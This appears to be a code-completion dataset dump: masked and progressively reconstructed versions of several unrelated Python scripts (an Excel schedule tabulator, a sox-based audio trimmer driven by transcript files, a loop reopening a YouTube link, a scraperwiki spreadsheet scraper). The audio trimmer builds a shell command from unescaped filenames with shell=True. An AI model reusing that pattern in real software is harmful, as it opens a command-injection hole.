for x, cell in enumerate(row):\n sheet.cell(row=start_row + y, column=start_col + x, value=l_2d[\n y][x])\n\n\nwrite_list_2d(sheet, ans, 1, 1)\nwb.save(Output)\nprint(sheets[0])\n",
"step-4": "import pandas as pd\nimport os\nimport openpyxl\nfrom collections import defaultdict, deque\nfilename = 'kaito7.xlsx'\nOutput = 'output7.xlsx'\nwb = openpyxl.load_workbook(filename)\nsheets = wb.sheetnames\ndays = []\nnames = []\ndict = defaultdict(dict)\nfor sheet in sheets:\n sh = wb[sheet]\n i = 3\n while True:\n tmp = sh.cell(row=1, column=i).value\n if tmp:\n days.append(tmp)\n else:\n break\n i += 1\n print(days)\n days.pop()\n i = 2\n while True:\n tmp = sh.cell(row=i, column=2).value\n if tmp:\n names.append(tmp)\n else:\n break\n i += 1\n W = len(days)\n H = len(names)\n for y in range(2, 2 + H):\n for x in range(3, 3 + W):\n tmp = sh.cell(row=y, column=x).value\n dict[names[y - 2]][days[x - 3]] = tmp\ntimes = dict['しまむら']['7/10(水)'].split(', ')\nans = [[' ', ' '] + names]\nfor d in days:\n for t in times:\n tmpl = [d, t]\n for n in names:\n if dict[n][d] and t in dict[n][d]:\n tmpl.append(1)\n else:\n tmpl.append(0)\n ans.append(tmpl)\nfor a in ans:\n print(a)\nwb = openpyxl.load_workbook(Output)\nsheets = wb.sheetnames\nsheet = wb[sheets[0]]\n\n\ndef write_list_2d(sheet, l_2d, start_row, start_col):\n for y, row in enumerate(l_2d):\n for x, cell in enumerate(row):\n sheet.cell(row=start_row + y, column=start_col + x, value=l_2d[\n y][x])\n\n\nwrite_list_2d(sheet, ans, 1, 1)\nwb.save(Output)\nprint(sheets[0])\n",
"step-5": "import pandas as pd\nimport os\nimport openpyxl\nfrom collections import defaultdict,deque\n\n# 調節用パラメータ\nfilename = 'kaito7.xlsx' # 入力ファイル名\nOutput = 'output7.xlsx' # 出力ディレクトリ\n\n\nwb = openpyxl.load_workbook(filename)\nsheets = wb.sheetnames\n\ndays = []\nnames = []\ndict = defaultdict(dict)\nfor sheet in sheets:\n sh = wb[sheet]\n i = 3\n while True:\n tmp = sh.cell(row=1,column=i).value\n if tmp:\n days.append(tmp)\n else:\n break\n i += 1\n print(days)\n days.pop()\n\n i = 2\n while True:\n tmp = sh.cell(row=i,column=2).value\n if tmp:\n names.append(tmp)\n else:\n break\n i += 1\n\n W = len(days)\n H = len(names)\n for y in range(2,2+H):\n for x in range(3,3+W):\n tmp = sh.cell(row=y,column=x).value\n dict[names[y-2]][days[x-3]] = tmp\n\ntimes = dict['しまむら']['7/10(水)'].split(', ')\n\nans = [[' ', ' '] + names]\nfor d in days:\n for t in times:\n tmpl = [d,t]\n for n in names:\n if dict[n][d] and t in dict[n][d]:\n tmpl.append(1)\n else:\n tmpl.append(0)\n ans.append(tmpl)\n\nfor a in ans:\n print(a)\n\n\nwb = openpyxl.load_workbook(Output)\nsheets = wb.sheetnames\nsheet = wb[sheets[0]]\n\n\ndef write_list_2d(sheet, l_2d, start_row, start_col):\n for y, row in enumerate(l_2d):\n for x, cell in enumerate(row):\n #print(l_2d[y][x])\n sheet.cell(row=start_row + y,column=start_col + x,value=l_2d[y][x])\n #print(sheet.cell(row=start_row + y,column=start_col + x).value)\n\nwrite_list_2d(sheet,ans,1,1)\n\nwb.save(Output)\n\nprint(sheets[0])\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#!/usr/bin/env python3
# Script qui permet de couper au début ou à la fin d'un fichier audio (.wav)
# un silence ou un passage musical à partir d'un fichier de transcription correspondant.
# Supporte uniquement l'extension audio .wav.
# Supporte les formats de transcriptions suivants :
# - .stm
# - .mlfmanu
# Usage : python cutAudioFile.py audio.wav transcriptFile.* audio_trimmed.wav
import sys
from os import path # Pour couper l'extension de fichier
from subprocess import check_output, CalledProcessError, STDOUT # Pour lancer sox
# Pour parser les arguments
from argparse import ArgumentParser, RawTextHelpFormatter, ArgumentTypeError
import sys
import utils
# Cherche le début et la fin de la coupe dans le fichier de transcription.
# Retourne les temps de début et de fin de la coupe en secondes.
# Format stm.
def searchBeginAndEndStm(transFileName):
fileName = path.splitext(path.basename(transFileName))[0] # Nom du stm sans extension
# On ouvre le fichier avec le bon encodage si celui-ci est précisé
if (path.isfile(path.dirname(transFileName) + "/encoding.txt")):
e = open(path.dirname(transFileName) + "/encoding.txt", 'r')
encod = e.readline()
f = open(transFileName, 'r', encoding=encod)
e.close()
else:
f = open(transFileName, 'r')
#Tant qu'on a pas une ligne de transcription (commencant par le nom de fichier) on lit en avancant
currentLine = f.readline()
while (currentLine.split()[0] != fileName):
currentLine = f.readline()
#Si la première ligne est un silence/musique, on prend comme début le timestamp de fin, sinon le timestamp de début
if (currentLine.split()[2] == "inter_segment_gap"):
debut = float(currentLine.split()[4])
else:
debut = float(currentLine.split()[3])
#On va jusqu'à la fin du fichier en conservant la dernière ligne "correcte"
nextLine = f.readline()
while (nextLine != ''):
if (nextLine.split()[0] == fileName and nextLine.split()[2] != "inter_segment_gap"):
currentLine = nextLine
nextLine = f.readline()
#On prend la fin de la dernière phrase
fin = float(currentLine.split()[4])
f.close()
return (debut, fin)
# Cherche le début et la fin de la coupe dans le fichier de transcription.
# Retourne les temps de début et de fin de la coupe en secondes.
# Format mlfmanu.
def searchBeginAndEndMlfmanu(transFileName):
fileName = path.splitext(path.basename(transFileName))[0] #Nom du fichier sans extension
f = open(transFileName, 'r')
currentLine = f.readline()
# On lit le fichier ligne par ligne tant qu'on a pas atteint une ligne non vide,
# qui n'est pas un commentaire ou qui n'est pas un silence.
while (currentLine[0] == "#" or currentLine[0] == "\"" or currentLine.split()[2] == "sil"):
currentLine = f.readline()
debut = float(currentLine.split()[0]) / 10000000; #Conversion en secondes
nextLine = f.readline()
# On lit ligne par ligne tant qu'on a pas atteint la dernière ligne (ligne de silence exclus)
while (nextLine[0] != '.'):
if (nextLine.split()[2] != "sil"):
currentLine = nextLine
nextLine = f.readline()
fin = float(currentLine.split()[1]) / 10000000; #Conversion en secondes
f.close()
return (debut, fin)
# Coupe le fichier audio de cutBegin jusqu'à cutEnd (en secondes).
def cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):
duration = cutEnd - cutBegin
try:
check_output("sox " + audioFileName + " " + cutFileName + " trim " + str(cutBegin) + " " + str(duration), shell = True, stderr=STDOUT)
except CalledProcessError as exc:
utils.eprintCalledProcessError(exc, "à SOX")
sys.exit(1)
def main(audioFileName, transFileName, outputFileName, beginningTime=None, endTime=None):
extension = path.splitext(transFileName)[1]
if (extension == ".stm"):
(debut, fin) = searchBeginAndEndStm(transFileName)
elif (extension == ".mlfmanu"):
(debut, fin) = searchBeginAndEndMlfmanu(transFileName)
# On prend les temps "les plus limitants"
if (beginningTime is not None and beginningTime > debut):
debut = beginningTime
if (endTime is not None and endTime < fin):
fin = endTime
cutAudioFile(audioFileName, outputFileName, debut, fin) # On coupe le fichier audio
def parseArgs():
parser = ArgumentParser(description="Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\n"
"Si les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.", formatter_class=RawTextHelpFormatter)
parser.add_argument("audioFileName", metavar="audioFile",
help="fichier audio (extension wav uniquement).",
type=utils.isValidFile)
parser.add_argument("transFileName", metavar="transcriptFile",
help="fichier de transcription (extensions stm et mlfmanu supportées).",
type=utils.isValidTranscriptFile)
parser.add_argument("outputFileName", metavar="outputFile",
help="nom du fichier de sortie (coupé).")
parser.add_argument("-b", "--beginning", dest="beginningTime", required=False,
help="le temps de début de la coupe.", metavar="beginningTime",
type=utils.isPositiveNumber)
parser.add_argument("-e", "--end", dest="endTime", required=False,
help="le temps de fin de la coupe.", metavar="endTime",
type=utils.isPositiveNumber)
args = parser.parse_args()
return (args.audioFileName, args.transFileName, args.outputFileName, args.beginningTime, args.endTime)
if __name__ == '__main__':
args = parseArgs() # Parse les arguments
main(*args) # Unpack le tuple et passe les éléments en paramétre du main
|
normal
|
{
"blob_id": "77531233219b76be51aed86536e4d92b8dc5ccad",
"index": 5494,
"step-1": "<mask token>\n\n\ndef searchBeginAndEndStm(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n if path.isfile(path.dirname(transFileName) + '/encoding.txt'):\n e = open(path.dirname(transFileName) + '/encoding.txt', 'r')\n encod = e.readline()\n f = open(transFileName, 'r', encoding=encod)\n e.close()\n else:\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine.split()[0] != fileName:\n currentLine = f.readline()\n if currentLine.split()[2] == 'inter_segment_gap':\n debut = float(currentLine.split()[4])\n else:\n debut = float(currentLine.split()[3])\n nextLine = f.readline()\n while nextLine != '':\n if nextLine.split()[0] == fileName and nextLine.split()[2\n ] != 'inter_segment_gap':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[4])\n f.close()\n return debut, fin\n\n\ndef searchBeginAndEndMlfmanu(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine[0] == '#' or currentLine[0] == '\"' or currentLine.split(\n )[2] == 'sil':\n currentLine = f.readline()\n debut = float(currentLine.split()[0]) / 10000000\n nextLine = f.readline()\n while nextLine[0] != '.':\n if nextLine.split()[2] != 'sil':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[1]) / 10000000\n f.close()\n return debut, fin\n\n\ndef cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):\n duration = cutEnd - cutBegin\n try:\n check_output('sox ' + audioFileName + ' ' + cutFileName + ' trim ' +\n str(cutBegin) + ' ' + str(duration), shell=True, stderr=STDOUT)\n except CalledProcessError as exc:\n utils.eprintCalledProcessError(exc, 'à SOX')\n sys.exit(1)\n\n\n<mask token>\n\n\ndef parseArgs():\n parser = ArgumentParser(description=\n \"\"\"Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\nSi les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.\"\"\"\n , formatter_class=RawTextHelpFormatter)\n parser.add_argument('audioFileName', metavar='audioFile', help=\n 'fichier audio (extension wav uniquement).', type=utils.isValidFile)\n parser.add_argument('transFileName', metavar='transcriptFile', help=\n 'fichier de transcription (extensions stm et mlfmanu supportées).',\n type=utils.isValidTranscriptFile)\n parser.add_argument('outputFileName', metavar='outputFile', help=\n 'nom du fichier de sortie (coupé).')\n parser.add_argument('-b', '--beginning', dest='beginningTime', required\n =False, help='le temps de début de la coupe.', metavar=\n 'beginningTime', type=utils.isPositiveNumber)\n parser.add_argument('-e', '--end', dest='endTime', required=False, help\n ='le temps de fin de la coupe.', metavar='endTime', type=utils.\n isPositiveNumber)\n args = parser.parse_args()\n return (args.audioFileName, args.transFileName, args.outputFileName,\n args.beginningTime, args.endTime)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef searchBeginAndEndStm(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n if path.isfile(path.dirname(transFileName) + '/encoding.txt'):\n e = open(path.dirname(transFileName) + '/encoding.txt', 'r')\n encod = e.readline()\n f = open(transFileName, 'r', encoding=encod)\n e.close()\n else:\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine.split()[0] != fileName:\n currentLine = f.readline()\n if currentLine.split()[2] == 'inter_segment_gap':\n debut = float(currentLine.split()[4])\n else:\n debut = float(currentLine.split()[3])\n nextLine = f.readline()\n while nextLine != '':\n if nextLine.split()[0] == fileName and nextLine.split()[2\n ] != 'inter_segment_gap':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[4])\n f.close()\n return debut, fin\n\n\ndef searchBeginAndEndMlfmanu(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine[0] == '#' or currentLine[0] == '\"' or currentLine.split(\n )[2] == 'sil':\n currentLine = f.readline()\n debut = float(currentLine.split()[0]) / 10000000\n nextLine = f.readline()\n while nextLine[0] != '.':\n if nextLine.split()[2] != 'sil':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[1]) / 10000000\n f.close()\n return debut, fin\n\n\ndef cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):\n duration = cutEnd - cutBegin\n try:\n check_output('sox ' + audioFileName + ' ' + cutFileName + ' trim ' +\n str(cutBegin) + ' ' + str(duration), shell=True, stderr=STDOUT)\n except CalledProcessError as exc:\n utils.eprintCalledProcessError(exc, 'à SOX')\n sys.exit(1)\n\n\ndef main(audioFileName, transFileName, outputFileName, beginningTime=None,\n endTime=None):\n extension = path.splitext(transFileName)[1]\n if extension == '.stm':\n debut, fin = searchBeginAndEndStm(transFileName)\n elif extension == '.mlfmanu':\n debut, fin = searchBeginAndEndMlfmanu(transFileName)\n if beginningTime is not None and beginningTime > debut:\n debut = beginningTime\n if endTime is not None and endTime < fin:\n fin = endTime\n cutAudioFile(audioFileName, outputFileName, debut, fin)\n\n\ndef parseArgs():\n parser = ArgumentParser(description=\n \"\"\"Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\nSi les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.\"\"\"\n , formatter_class=RawTextHelpFormatter)\n parser.add_argument('audioFileName', metavar='audioFile', help=\n 'fichier audio (extension wav uniquement).', type=utils.isValidFile)\n parser.add_argument('transFileName', metavar='transcriptFile', help=\n 'fichier de transcription (extensions stm et mlfmanu supportées).',\n type=utils.isValidTranscriptFile)\n parser.add_argument('outputFileName', metavar='outputFile', help=\n 'nom du fichier de sortie (coupé).')\n parser.add_argument('-b', '--beginning', dest='beginningTime', required\n =False, help='le temps de début de la coupe.', metavar=\n 'beginningTime', type=utils.isPositiveNumber)\n parser.add_argument('-e', '--end', dest='endTime', required=False, help\n ='le temps de fin de la coupe.', metavar='endTime', type=utils.\n isPositiveNumber)\n args = parser.parse_args()\n return (args.audioFileName, args.transFileName, args.outputFileName,\n args.beginningTime, args.endTime)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef searchBeginAndEndStm(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n if path.isfile(path.dirname(transFileName) + '/encoding.txt'):\n e = open(path.dirname(transFileName) + '/encoding.txt', 'r')\n encod = e.readline()\n f = open(transFileName, 'r', encoding=encod)\n e.close()\n else:\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine.split()[0] != fileName:\n currentLine = f.readline()\n if currentLine.split()[2] == 'inter_segment_gap':\n debut = float(currentLine.split()[4])\n else:\n debut = float(currentLine.split()[3])\n nextLine = f.readline()\n while nextLine != '':\n if nextLine.split()[0] == fileName and nextLine.split()[2\n ] != 'inter_segment_gap':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[4])\n f.close()\n return debut, fin\n\n\ndef searchBeginAndEndMlfmanu(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine[0] == '#' or currentLine[0] == '\"' or currentLine.split(\n )[2] == 'sil':\n currentLine = f.readline()\n debut = float(currentLine.split()[0]) / 10000000\n nextLine = f.readline()\n while nextLine[0] != '.':\n if nextLine.split()[2] != 'sil':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[1]) / 10000000\n f.close()\n return debut, fin\n\n\ndef cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):\n duration = cutEnd - cutBegin\n try:\n check_output('sox ' + audioFileName + ' ' + cutFileName + ' trim ' +\n str(cutBegin) + ' ' + str(duration), shell=True, stderr=STDOUT)\n except CalledProcessError as exc:\n utils.eprintCalledProcessError(exc, 'à SOX')\n sys.exit(1)\n\n\ndef main(audioFileName, transFileName, outputFileName, beginningTime=None,\n endTime=None):\n extension = path.splitext(transFileName)[1]\n if extension == '.stm':\n debut, fin = searchBeginAndEndStm(transFileName)\n elif extension == '.mlfmanu':\n debut, fin = searchBeginAndEndMlfmanu(transFileName)\n if beginningTime is not None and beginningTime > debut:\n debut = beginningTime\n if endTime is not None and endTime < fin:\n fin = endTime\n cutAudioFile(audioFileName, outputFileName, debut, fin)\n\n\ndef parseArgs():\n parser = ArgumentParser(description=\n \"\"\"Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\nSi les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.\"\"\"\n , formatter_class=RawTextHelpFormatter)\n parser.add_argument('audioFileName', metavar='audioFile', help=\n 'fichier audio (extension wav uniquement).', type=utils.isValidFile)\n parser.add_argument('transFileName', metavar='transcriptFile', help=\n 'fichier de transcription (extensions stm et mlfmanu supportées).',\n type=utils.isValidTranscriptFile)\n parser.add_argument('outputFileName', metavar='outputFile', help=\n 'nom du fichier de sortie (coupé).')\n parser.add_argument('-b', '--beginning', dest='beginningTime', required\n =False, help='le temps de début de la coupe.', metavar=\n 'beginningTime', type=utils.isPositiveNumber)\n parser.add_argument('-e', '--end', dest='endTime', required=False, help\n ='le temps de fin de la coupe.', metavar='endTime', type=utils.\n isPositiveNumber)\n args = parser.parse_args()\n return (args.audioFileName, args.transFileName, args.outputFileName,\n args.beginningTime, args.endTime)\n\n\nif __name__ == '__main__':\n args = parseArgs()\n main(*args)\n",
"step-4": "import sys\nfrom os import path\nfrom subprocess import check_output, CalledProcessError, STDOUT\nfrom argparse import ArgumentParser, RawTextHelpFormatter, ArgumentTypeError\nimport sys\nimport utils\n\n\ndef searchBeginAndEndStm(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n if path.isfile(path.dirname(transFileName) + '/encoding.txt'):\n e = open(path.dirname(transFileName) + '/encoding.txt', 'r')\n encod = e.readline()\n f = open(transFileName, 'r', encoding=encod)\n e.close()\n else:\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine.split()[0] != fileName:\n currentLine = f.readline()\n if currentLine.split()[2] == 'inter_segment_gap':\n debut = float(currentLine.split()[4])\n else:\n debut = float(currentLine.split()[3])\n nextLine = f.readline()\n while nextLine != '':\n if nextLine.split()[0] == fileName and nextLine.split()[2\n ] != 'inter_segment_gap':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[4])\n f.close()\n return debut, fin\n\n\ndef searchBeginAndEndMlfmanu(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine[0] == '#' or currentLine[0] == '\"' or currentLine.split(\n )[2] == 'sil':\n currentLine = f.readline()\n debut = float(currentLine.split()[0]) / 10000000\n nextLine = f.readline()\n while nextLine[0] != '.':\n if nextLine.split()[2] != 'sil':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[1]) / 10000000\n f.close()\n return debut, fin\n\n\ndef cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):\n duration = cutEnd - cutBegin\n try:\n check_output('sox ' + audioFileName + ' ' + cutFileName + ' trim ' +\n str(cutBegin) + ' ' + str(duration), shell=True, stderr=STDOUT)\n except CalledProcessError as exc:\n utils.eprintCalledProcessError(exc, 'à SOX')\n sys.exit(1)\n\n\ndef main(audioFileName, transFileName, outputFileName, beginningTime=None,\n endTime=None):\n extension = path.splitext(transFileName)[1]\n if extension == '.stm':\n debut, fin = searchBeginAndEndStm(transFileName)\n elif extension == '.mlfmanu':\n debut, fin = searchBeginAndEndMlfmanu(transFileName)\n if beginningTime is not None and beginningTime > debut:\n debut = beginningTime\n if endTime is not None and endTime < fin:\n fin = endTime\n cutAudioFile(audioFileName, outputFileName, debut, fin)\n\n\ndef parseArgs():\n parser = ArgumentParser(description=\n \"\"\"Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\nSi les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.\"\"\"\n , formatter_class=RawTextHelpFormatter)\n parser.add_argument('audioFileName', metavar='audioFile', help=\n 'fichier audio (extension wav uniquement).', type=utils.isValidFile)\n parser.add_argument('transFileName', metavar='transcriptFile', help=\n 'fichier de transcription (extensions stm et mlfmanu supportées).',\n type=utils.isValidTranscriptFile)\n parser.add_argument('outputFileName', metavar='outputFile', help=\n 'nom du fichier de sortie (coupé).')\n parser.add_argument('-b', '--beginning', dest='beginningTime', required\n =False, help='le temps de début de la coupe.', metavar=\n 'beginningTime', type=utils.isPositiveNumber)\n parser.add_argument('-e', '--end', dest='endTime', required=False, help\n ='le temps de fin de la coupe.', metavar='endTime', type=utils.\n isPositiveNumber)\n args = parser.parse_args()\n return (args.audioFileName, args.transFileName, args.outputFileName,\n args.beginningTime, args.endTime)\n\n\nif __name__ == '__main__':\n args = parseArgs()\n main(*args)\n",
"step-5": "#!/usr/bin/env python3\r\n\r\n# Script qui permet de couper au début ou à la fin d'un fichier audio (.wav)\r\n# un silence ou un passage musical à partir d'un fichier de transcription correspondant.\r\n# Supporte uniquement l'extension audio .wav.\r\n# Supporte les formats de transcriptions suivants :\r\n# - .stm\r\n# - .mlfmanu\r\n\r\n# Usage : python cutAudioFile.py audio.wav transcriptFile.* audio_trimmed.wav\r\nimport sys\r\nfrom os import path # Pour couper l'extension de fichier\r\nfrom subprocess import check_output, CalledProcessError, STDOUT # Pour lancer sox\r\n# Pour parser les arguments\r\nfrom argparse import ArgumentParser, RawTextHelpFormatter, ArgumentTypeError\r\nimport sys\r\nimport utils\r\n\r\n# Cherche le début et la fin de la coupe dans le fichier de transcription.\r\n# Retourne les temps de début et de fin de la coupe en secondes.\r\n# Format stm.\r\ndef searchBeginAndEndStm(transFileName):\r\n fileName = path.splitext(path.basename(transFileName))[0] # Nom du stm sans extension\r\n\r\n # On ouvre le fichier avec le bon encodage si celui-ci est précisé\r\n if (path.isfile(path.dirname(transFileName) + \"/encoding.txt\")):\r\n e = open(path.dirname(transFileName) + \"/encoding.txt\", 'r')\r\n encod = e.readline()\r\n f = open(transFileName, 'r', encoding=encod)\r\n e.close()\r\n else:\r\n f = open(transFileName, 'r')\r\n\r\n #Tant qu'on a pas une ligne de transcription (commencant par le nom de fichier) on lit en avancant\r\n currentLine = f.readline()\r\n while (currentLine.split()[0] != fileName):\r\n currentLine = f.readline()\r\n\r\n #Si la première ligne est un silence/musique, on prend comme début le timestamp de fin, sinon le timestamp de début\r\n if (currentLine.split()[2] == \"inter_segment_gap\"):\r\n debut = float(currentLine.split()[4])\r\n else:\r\n debut = float(currentLine.split()[3])\r\n \r\n #On va jusqu'à la fin du fichier en conservant la dernière ligne \"correcte\"\r\n nextLine = f.readline()\r\n while (nextLine != ''):\r\n if (nextLine.split()[0] == fileName and nextLine.split()[2] != \"inter_segment_gap\"):\r\n currentLine = nextLine\r\n nextLine = f.readline()\r\n\r\n #On prend la fin de la dernière phrase\r\n fin = float(currentLine.split()[4]) \r\n \r\n f.close()\r\n\r\n return (debut, fin)\r\n\r\n# Cherche le début et la fin de la coupe dans le fichier de transcription.\r\n# Retourne les temps de début et de fin de la coupe en secondes.\r\n# Format mlfmanu.\r\ndef searchBeginAndEndMlfmanu(transFileName):\r\n fileName = path.splitext(path.basename(transFileName))[0] #Nom du fichier sans extension\r\n \r\n f = open(transFileName, 'r')\r\n currentLine = f.readline()\r\n # On lit le fichier ligne par ligne tant qu'on a pas atteint une ligne non vide,\r\n # qui n'est pas un commentaire ou qui n'est pas un silence.\r\n while (currentLine[0] == \"#\" or currentLine[0] == \"\\\"\" or currentLine.split()[2] == \"sil\"):\r\n currentLine = f.readline()\r\n\r\n debut = float(currentLine.split()[0]) / 10000000; #Conversion en secondes\r\n\r\n nextLine = f.readline()\r\n # On lit ligne par ligne tant qu'on a pas atteint la dernière ligne (ligne de silence exclus)\r\n while (nextLine[0] != '.'):\r\n if (nextLine.split()[2] != \"sil\"):\r\n currentLine = nextLine\r\n nextLine = f.readline()\r\n \r\n fin = float(currentLine.split()[1]) / 10000000; #Conversion en secondes\r\n \r\n f.close()\r\n \r\n return (debut, fin)\r\n\r\n# Coupe le fichier audio de cutBegin jusqu'à cutEnd (en secondes).\r\ndef cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):\r\n duration = cutEnd - cutBegin\r\n try:\r\n check_output(\"sox \" + audioFileName + \" \" + cutFileName + \" trim \" + str(cutBegin) + \" \" + str(duration), shell = True, stderr=STDOUT)\r\n except CalledProcessError as exc: \r\n utils.eprintCalledProcessError(exc, \"à SOX\")\r\n sys.exit(1)\r\n\r\ndef main(audioFileName, transFileName, outputFileName, beginningTime=None, endTime=None):\r\n extension = path.splitext(transFileName)[1]\r\n if (extension == \".stm\"):\r\n (debut, fin) = searchBeginAndEndStm(transFileName)\r\n elif (extension == \".mlfmanu\"):\r\n (debut, fin) = searchBeginAndEndMlfmanu(transFileName)\r\n \r\n # On prend les temps \"les plus limitants\"\r\n if (beginningTime is not None and beginningTime > debut):\r\n debut = beginningTime\r\n if (endTime is not None and endTime < fin):\r\n fin = endTime\r\n\r\n cutAudioFile(audioFileName, outputFileName, debut, fin) # On coupe le fichier audio\r\n\r\ndef parseArgs():\r\n parser = ArgumentParser(description=\"Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\\n\"\r\n \"Si les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.\", formatter_class=RawTextHelpFormatter)\r\n parser.add_argument(\"audioFileName\", metavar=\"audioFile\",\r\n help=\"fichier audio (extension wav uniquement).\",\r\n type=utils.isValidFile)\r\n parser.add_argument(\"transFileName\", metavar=\"transcriptFile\",\r\n help=\"fichier de transcription (extensions stm et mlfmanu supportées).\",\r\n type=utils.isValidTranscriptFile)\r\n parser.add_argument(\"outputFileName\", metavar=\"outputFile\",\r\n help=\"nom du fichier de sortie (coupé).\")\t\t\t\t\t\t\r\n parser.add_argument(\"-b\", \"--beginning\", dest=\"beginningTime\", required=False,\r\n help=\"le temps de début de la coupe.\", metavar=\"beginningTime\",\r\n type=utils.isPositiveNumber)\r\n parser.add_argument(\"-e\", \"--end\", dest=\"endTime\", required=False,\r\n help=\"le temps de fin de la coupe.\", metavar=\"endTime\",\r\n type=utils.isPositiveNumber)\r\n \r\n args = parser.parse_args()\r\n \r\n return (args.audioFileName, args.transFileName, args.outputFileName, args.beginningTime, args.endTime)\r\n \r\nif __name__ == '__main__':\r\n args = parseArgs() # Parse les arguments\r\n main(*args) # Unpack le tuple et passe les éléments en paramétre du main \r\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while count < total:
webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')
time.sleep(5 * 60 * 60)
count += 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
total = 3
count = 0
while count < total:
webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')
time.sleep(5 * 60 * 60)
count += 1
<|reserved_special_token_1|>
import webbrowser
import time
total = 3
count = 0
while count < total:
webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')
time.sleep(5 * 60 * 60)
count += 1
|
flexible
|
{
"blob_id": "e11a04cad967ae377449aab8b12bfde23e403335",
"index": 8391,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile count < total:\n webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')\n time.sleep(5 * 60 * 60)\n count += 1\n",
"step-3": "<mask token>\ntotal = 3\ncount = 0\nwhile count < total:\n webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')\n time.sleep(5 * 60 * 60)\n count += 1\n",
"step-4": "import webbrowser\nimport time\ntotal = 3\ncount = 0\nwhile count < total:\n webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')\n time.sleep(5 * 60 * 60)\n count += 1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import scraperwiki
import xlrd
xlbin = scraperwiki.scrape("http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls")
book = xlrd.open_workbook(file_contents=xlbin)
sheet = book.sheet_by_index(0)
for n, s in enumerate(book.sheets()):
print "Sheet %d is called %s and has %d columns and %d rows" % (n, s.name, s.ncols, s.nrows)
print sheet.row_values(4)
import datetime
def cellval(cell, datemode):
if cell.ctype == xlrd.XL_CELL_DATE:
datetuple = xlrd.xldate_as_tuple(cell.value, datemode)
if datetuple[3:] == (0, 0, 0):
return datetime.date(datetuple[0], datetuple[1], datetuple[2])
return datetime.date(datetuple[0], datetuple[1], datetuple[2], datetuple[3], datetuple[4], datetuple[5])
if cell.ctype == xlrd.XL_CELL_EMPTY: return None
if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1
return cell.value
print [ cellval(c, book.datemode) for c in sheet.row(4) ]
keys = sheet.row_values(2)
keys[1] = keys[1].replace('.', '')
print keys
for rownumber in range(4, sheet.nrows):
values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]
data = dict(zip(keys, values))
data['rownumber'] = rownumber
del data['']
if data['DATE'] != None and data['FLEET NO'] != None:
scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)
import scraperwiki
import xlrd
